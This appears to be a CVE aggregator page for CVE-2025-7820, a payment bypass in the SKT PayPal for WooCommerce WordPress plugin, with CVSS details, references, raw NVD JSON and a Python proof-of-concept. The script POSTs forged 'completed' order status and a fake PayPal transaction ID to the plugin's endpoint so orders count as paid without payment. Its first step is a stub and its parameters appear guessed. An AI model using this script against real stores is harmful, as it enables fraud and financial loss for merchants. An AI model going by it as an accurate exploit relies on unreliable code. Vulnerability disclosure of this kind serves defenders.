CVE-2025-7820

Description

The SKT PayPal for WooCommerce plugin for WordPress is vulnerable to Payment Bypass in all versions up to, and including, 1.4. This is due to the plugin only enforcing client side controls instead of server-side controls when processing payments. This makes it possible for unauthenticated attackers to make confirmed purchases without actually paying for them.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

SKT PayPal for WooCommerce <= 1.4 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3 """ CVE-2025-7820 PoC - SKT PayPal for WooCommerce Payment Bypass This PoC demonstrates the payment bypass vulnerability in SKT PayPal for WooCommerce <= 1.4 The vulnerability allows unauthenticated attackers to confirm orders without actual payment. """ import requests import json TARGET_URL = "https://example-woocommerce-site.com" TARGET_ENDPOINT = f"{TARGET_URL}/?wc-api=wc_skt_paypal" def create_malicious_order(): """ Step 1: Create a normal order through the WooCommerce checkout process This simulates a legitimate purchase attempt. """ checkout_data = { "billing_first_name": "Test", "billing_last_name": "User", "billing_email": "[email protected]", "billing_phone": "1234567890", "payment_method": "skt_paypal", "products": ["product_id_123"] } # In real scenario, this would be done through the website print("[*] Step 1: Order created (payment pending)") return {"order_id": "ORDER_12345", "amount": "99.99"} def bypass_payment(order_id): """ Step 2: Bypass payment verification by directly setting order status to 'completed' The vulnerable plugin trusts client-side order status without server-side PayPal verification. """ print(f"[*] Step 2: Attempting payment bypass for order {order_id}") # Malicious request to mark order as completed without payment bypass_payload = { "order_id": order_id, "order_status": "completed", # Attacker-controlled status "payment_status": "completed", "skt_paypal_txn_id": "FAKE_TXN_ID", # Forged transaction ID "skt_paypal_status": "Completed" } headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Payment Bypass PoC)" } try: # This endpoint is vulnerable - it doesn't verify PayPal transaction server-side response = requests.post( TARGET_ENDPOINT, data=bypass_payload, headers=headers, verify=False, timeout=10 ) if response.status_code == 200: print("[+] Payment bypass successful! Order marked as paid.") print(f"[+] Attacker now has access to paid content without payment.") return True else: print(f"[-] Request failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return False def verify_order_access(order_id): """ Step 3: Verify that the attacker can now access paid content """ print(f"[*] Step 3: Verifying access to order {order_id}") # Attacker can now download products, access subscriptions, etc. access_url = f"{TARGET_URL}/my-account/view-order/{order_id}/" print(f"[+] Attacker can now access: {access_url}") print("[+] Impact: Financial loss to merchant, unauthorized access to paid content") if __name__ == "__main__": print("=" * 60) print("CVE-2025-7820 PoC - SKT PayPal for WooCommerce Payment Bypass") print("=" * 60) # Execute attack chain order_info = create_malicious_order() success = bypass_payment(order_info["order_id"]) if success: verify_order_access(order_info["order_id"]) print("\n[*] PoC execution completed") print("[*] Mitigation: Upgrade to SKT PayPal for WooCommerce > 1.4")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-7820
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-7820
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-7820/
[4] VulDB https://vuldb.com/cve/CVE-2025-7820
[5] https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3403118%40skt-paypal-for-woocommerce&new=3403118%40skt-paypal-for-woocommerce&sfp_email=&sfph_mail=
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/1a67b1b3-eb39-4e9a-ba44-ea637fc3bba1?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-7820", "sourceIdentifier": "[email protected]", "published": "2025-11-27T05:16:17.913", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The SKT PayPal for WooCommerce plugin for WordPress is vulnerable to Payment Bypass in all versions up to, and including, 1.4. This is due to the plugin only enforcing client side controls instead of server-side controls when processing payments. This makes it possible for unauthenticated attackers to make confirmed purchases without actually paying for them."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-602"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3403118%40skt-paypal-for-woocommerce&new=3403118%40skt-paypal-for-woocommerce&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1a67b1b3-eb39-4e9a-ba44-ea637fc3bba1?source=cve", "source": "[email protected]"}]}}